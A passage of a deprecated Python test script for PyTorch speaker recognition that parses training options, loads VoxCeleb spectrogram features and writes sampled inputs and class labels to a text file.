backward_hooks):\n tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)\n tensor.requires_grad = requires_grad\n tensor._backward_hooks = backward_hooks\n return tensor\n\n\n torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch Speaker Recognition')\n\n# Data options\nparser.add_argument('--train-dir', type=str,\n default='/home/work2020/yangwenhao/project/lstm_speaker_verification/data/vox1/spect/dev_log',\n help='path to dataset')\n# parser.add_argument('--train-test-dir', type=str, required=True, help='path to dataset')\n# parser.add_argument('--valid-dir', type=str, required=True, help='path to dataset')\n# parser.add_argument('--test-dir', type=str, required=True, help='path to voxceleb1 test dataset')\nparser.add_argument('--log-scale', action='store_true', default=False, help='log power spectogram')\nparser.add_argument('--exp', action='store_true', default=False, help='exp power spectogram')\n\nparser.add_argument('--trials', type=str, default='trials', help='path to voxceleb1 test dataset')\nparser.add_argument('--train-trials', type=str, default='trials', help='path to voxceleb1 test dataset')\n\nparser.add_argument('--sitw-dir', type=str, help='path to voxceleb1 test dataset')\nparser.add_argument('--fix-length', action='store_true', default=True, help='need to make mfb file')\nparser.add_argument('--test-input', type=str, default='fix', choices=['var', 'fix'],\n help='batchnorm with instance norm')\nparser.add_argument('--random-chunk', nargs='+', type=int, default=[], metavar='MINCHUNK')\nparser.add_argument('--chunk-size', type=int, default=300, metavar='CHUNK')\nparser.add_argument('--num-frames', type=int, default=300, metavar='CHUNK')\n\nparser.add_argument('--remove-vad', action='store_true', default=False, help='using Cosine similarity')\nparser.add_argument('--extract', action='store_true', default=True, help='need to make mfb file')\nparser.add_argument('--shuffle', action='store_false', default=True, help='need to make mfb file')\n\nparser.add_argument('--nj', default=10, type=int, metavar='NJOB', help='num of job')\nparser.add_argument('--feat-format', type=str, default='kaldi', choices=['kaldi', 'npy'],\n help='number of jobs to make feats (default: 10)')\n\nparser.add_argument('--check-path', default='Data/test/',\n help='folder to output model checkpoints')\nparser.add_argument('--save-init', action='store_true', default=True, help='need to make mfb file')\nparser.add_argument('--resume',\n default='Data/test/checkpoint_10.pth', type=str,\n metavar='PATH',\n help='path to latest checkpoint (default: none)')\n\nparser.add_argument('--output-file',\n default='Data/test/rand_sequence.txt', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\n\nparser.add_argument('--start-epoch', default=1, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('--epochs', type=int, default=20, metavar='E',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--scheduler', default='multi', type=str,\n metavar='SCH', help='The optimizer to use (default: Adagrad)')\nparser.add_argument('--patience', default=2, type=int,\n metavar='PAT', help='patience for scheduler (default: 4)')\nparser.add_argument('--gamma', default=0.75, type=float,\n metavar='GAMMA', help='The optimizer to use (default: Adagrad)')\nparser.add_argument('--milestones', default='10,15', type=str,\n metavar='MIL', help='The optimizer to use (default: Adagrad)')\nparser.add_argument('--min-softmax-epoch', type=int, default=40, metavar='MINEPOCH',\n help='minimum epoch for initial parameter using softmax (default: 2')\nparser.add_argument('--veri-pairs', type=int, default=20000, metavar='VP',\n help='number of epochs to train (default: 10)')\n\n# Training options\n# Model options\nparser.add_argument('--model', type=str, help='path to voxceleb1 test dataset')\nparser.add_argument('--resnet-size', default=8, type=int,\n metavar='RES', help='The channels of convs layers)')\nparser.add_argument('--filter', type=str, default='None', help='replace batchnorm with instance norm')\nparser.add_argument('--filter-fix', action='store_true', default=False, help='replace batchnorm with instance norm')\n\nparser.add_argument('--input-norm', type=str, default='Mean', help='batchnorm with instance norm')\n\nparser.add_argument('--mask-layer', type=str, default='None', help='time or freq masking layers')\nparser.add_argument('--mask-len', type=int, default=20, help='maximum length of time or freq masking layers')\nparser.add_argument('--block-type', type=str, default='basic', help='replace batchnorm with instance norm')\nparser.add_argument('--relu-type', type=str, default='relu', help='replace batchnorm with instance norm')\nparser.add_argument('--transform', type=str, default=\"None\", help='add a transform layer after embedding layer')\n\nparser.add_argument('--vad', action='store_true', default=False, help='vad layers')\nparser.add_argument('--inception', action='store_true', default=False, help='multi size conv layer')\nparser.add_argument('--inst-norm', action='store_true', default=False, help='batchnorm with instance norm')\n\nparser.add_argument('--encoder-type', type=str, default='None', help='path to voxceleb1 test dataset')\nparser.add_argument('--channels', default='64,128,256', type=str, metavar='CHA', help='The channels of convs layers)')\nparser.add_argument('--feat-dim', default=64, type=int, metavar='N', help='acoustic feature dimension')\nparser.add_argument('--input-dim', default=257, type=int, metavar='N', help='acoustic feature dimension')\nparser.add_argument('--accu-steps', default=1, type=int, metavar='N', help='manual epoch number (useful on restarts)')\n\nparser.add_argument('--alpha', default=12, type=float, metavar='FEAT', help='acoustic feature dimension')\nparser.add_argument('--ring', default=12, type=float, metavar='RING', help='acoustic feature dimension')\n\nparser.add_argument('--kernel-size', default='5,5', type=str, metavar='KE', help='kernel size of conv filters')\nparser.add_argument('--context', default='5,3,3,5', type=str, metavar='KE', help='kernel size of conv filters')\n\nparser.add_argument('--padding', default='', type=str, metavar='KE', help='padding size of conv filters')\nparser.add_argument('--stride', default='2', type=str, metavar='ST', help='stride size of conv filters')\nparser.add_argument('--fast', action='store_true', default=False, help='max pooling for fast')\n\nparser.add_argument('--cos-sim', action='store_true', default=False, help='using Cosine similarity')\nparser.add_argument('--avg-size', type=int, default=4, metavar='ES', help='Dimensionality of the embedding')\nparser.add_argument('--time-dim', default=1, type=int, metavar='FEAT', help='acoustic feature dimension')\nparser.add_argument('--embedding-size', type=int, default=128, metavar='ES',\n help='Dimensionality of the embedding')\nparser.add_argument('--batch-size', type=int, default=128, metavar='BS',\n help='input batch size for training (default: 128)')\nparser.add_argument('--input-per-spks', type=int, default=384, metavar='IPFT',\n help='input sample per file for testing (default: 8)')\nparser.add_argument('--num-valid', type=int, default=5, metavar='IPFT',\n help='input sample per file for testing (default: 8)')\nparser.add_argument('--test-input-per-file', type=int, default=4, metavar='IPFT',\n help='input sample per file for testing (default: 8)')\nparser.add_argument('--test-batch-size', type=int, default=4, metavar='BST',\n help='input batch size for testing (default: 64)')\nparser.add_argument('--dropout-p', type=float, default=0.0, metavar='BST',\n help='input batch size for testing (default: 64)')\n\n# loss configure\nparser.add_argument('--loss-type', type=str, default='soft',\n help='path to voxceleb1 test dataset')\nparser.add_argument('--num-center', type=int, default=2, help='the num of source classes')\nparser.add_argument('--source-cls', type=int, default=1951,\n help='the num of source classes')\nparser.add_argument('--finetune', action='store_true', default=False,\n help='using Cosine similarity')\nparser.add_argument('--lr-ratio', type=float, default=0.0, metavar='LOSSRATIO',\n help='the ratio softmax loss - triplet loss (default: 2.0')\nparser.add_argument('--loss-ratio', type=float, default=0.1, metavar='LOSSRATIO',\n help='the ratio softmax loss - triplet loss (default: 2.0')\n\n# args for additive margin-softmax\nparser.add_argument('--margin', type=float, default=0.3, metavar='MARGIN',\n help='the margin value for the angualr softmax loss function (default: 3.0')\nparser.add_argument('--s', type=float, default=15, metavar='S',\n help='the margin value for the angualr softmax loss function (default: 3.0')\n\n# args for a-softmax\nparser.add_argument('--all-iteraion', type=int, default=0, metavar='M',\n help='the margin value for the angualr softmax loss function (default: 3.0')\nparser.add_argument('--m', type=int, default=3, metavar='M',\n help='the margin value for the angualr softmax loss function (default: 3.0')\nparser.add_argument('--lambda-min', type=int, default=5, metavar='S',\n help='random seed (default: 0)')\nparser.add_argument('--lambda-max', type=float, default=1000, metavar='S',\n help='random seed (default: 0)')\n\nparser.add_argument('--lr', type=float, default=0.1, metavar='LR', help='learning rate (default: 0.125)')\nparser.add_argument('--lr-decay', default=0, type=float, metavar='LRD',\n help='learning rate decay ratio (default: 1e-4')\nparser.add_argument('--weight-decay', default=5e-4, type=float,\n metavar='WEI', help='weight decay (default: 0.0)')\nparser.add_argument('--momentum', default=0.9, type=float,\n metavar='MOM', help='momentum for sgd (default: 0.9)')\nparser.add_argument('--dampening', default=0, type=float,\n metavar='DAM', help='dampening for sgd (default: 0.0)')\nparser.add_argument('--optimizer', default='sgd', type=str,\n metavar='OPT', help='The optimizer to use (default: Adagrad)')\nparser.add_argument('--grad-clip', default=0., type=float,\n help='momentum for sgd (default: 0.9)')\n# Device options\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='enables CUDA training')\nparser.add_argument('--gpu-id', default='0', type=str,\n help='id(s) for CUDA_VISIBLE_DEVICES')\nparser.add_argument('--seed', type=int, default=123456, metavar='S',\n help='random seed (default: 0)')\nparser.add_argument('--log-interval', type=int, default=10, metavar='LI',\n help='how many batches to wait before logging training status')\n\nparser.add_argument('--acoustic-feature', choices=['fbank', 'spectrogram', 'mfcc'], default='fbank',\n help='choose the acoustic features type.')\nparser.add_argument('--makemfb', action='store_true', default=False,\n help='need to make mfb file')\nparser.add_argument('--makespec', action='store_true', default=False,\n help='need to make spectrograms file')\n\nargs = parser.parse_args()\n\n# Set the device to use by setting CUDA_VISIBLE_DEVICES env variable in\n# order to prevent any memory allocation on unused GPUs\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n# os.environ['MASTER_ADDR'] = '127.0.0.1'\n# os.environ['MASTER_PORT'] = '29555'\n\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\n# torch.multiprocessing.set_sharing_strategy('file_system')\n\nif args.cuda:\n torch.cuda.manual_seed_all(args.seed)\n cudnn.benchmark = True\n\n# create logger\n# Define visulaize SummaryWriter instance\nwriter = SummaryWriter(logdir=args.check_path, filename_suffix='_first')\n\nsys.stdout = NewLogger(osp.join(args.check_path, 'log.%s.txt' % time.strftime(\"%Y.%m.%d\", time.localtime())))\n\nkwargs = {'num_workers': args.nj, 'pin_memory': False} if args.cuda else {}\nextract_kwargs = {'num_workers': args.nj, 'pin_memory': False} if args.cuda else {}\n\nif not os.path.exists(args.check_path):\n os.makedirs(args.check_path)\n\nopt_kwargs = {'lr': args.lr, 'lr_decay': args.lr_decay, 'weight_decay': args.weight_decay, 'dampening': args.dampening,\n 'momentum': args.momentum}\n\nl2_dist = nn.CosineSimilarity(dim=1, eps=1e-12) if args.cos_sim else nn.PairwiseDistance(p=2)\n\n# pdb.set_trace()\nif args.feat_format == 'kaldi':\n file_loader = read_mat\nelif args.feat_format == 'npy':\n file_loader = np.load\ntorch.multiprocessing.set_sharing_strategy('file_system')\n\n# train_dir = EgsDataset(dir=args.train_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform,\n# batch_size=args.batch_size, random_chunk=args.random_chunk)\ntransform = ConcateNumInput_Test(num_frames=args.num_frames, remove_vad=args.remove_vad)\n\ntrain_dir = ScriptTrainDataset(dir=args.train_dir, samples_per_speaker=args.input_per_spks,\n loader=file_loader, transform=transform, num_valid=args.num_valid,\n domain=False, rand_test=True)\n\n\n# train_extract_dir = KaldiExtractDataset(dir=args.train_test_dir,\n# transform=transform_V,\n# filer_loader=file_loader,\n# trials_file=args.train_trials)\n#\n# extract_dir = KaldiExtractDataset(dir=args.test_dir, transform=transform_V, filer_loader=file_loader)\n# valid_dir = EgsDataset(dir=args.valid_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform)\n\n\ndef train(train_loader, output_file):\n # switch to evaluate mode\n pbar = tqdm(enumerate(train_loader))\n\n # start_time = time.time()\n # pdb.set_trace()\n with open(output_file, 'w') as f:\n for batch_idx, (data, label) in pbar:\n for i in range(len(data)):\n if i == 0 and batch_idx % 10 == 0:\n print(str(data[i].squeeze().tolist()), str(label[i].tolist()))\n f.write(\"input: \" + str(data[i].squeeze().tolist()) + \" class: \" + str(label[i].tolist()) + \"\\n\")\n\n\ndef main():\n # Views the training images and displays the distance on anchor-negative and anchor-positive\n # test_display_triplet_distance = False\n # print the experiment configuration\n print('\\nCurrent time is \\33[91m{}\\33[0m.'.format(str(time.asctime())))\n opts = vars(args)\n keys = list(opts.keys())\n keys.sort()\n\n options = []\n for k in keys:\n options.append(\"\\'%s\\': \\'%s\\'\" % (str(k), str(opts[k])))\n\n print('Parsed options: \\n{ %s }' % (', '.join(options)))\n print('Number of Speakers: {}.\\n'.format(train_dir.num_spks))\n\n # dataset objects\n train_loader = torch.utils.data.DataLoader(train_dir, batch_size=args.batch_size, shuffle=args.shuffle, **kwargs)\n # valid_loader = torch.utils.data.DataLoader(valid_dir, batch_size=int(args.batch_size / 2), shuffle=False, **kwargs)\n # train_extract_loader = torch.utils.data.DataLoader(train_extract_dir, batch_size=1, shuffle=False, **extract_kwargs)\n\n start_time = time.time()\n\n train(train_loader, args.output_file)\n\n writer.close()\n stop_time = time.time()\n t = float(stop_time - start_time)\n print(\"Running %.4f minutes.\\n\" % (t / 60))\n exit(0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"TrainAndTest/deprecated/test_data_rand.py","file_name":"test_data_rand.py","file_ext":"py","file_size_in_byte":16945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}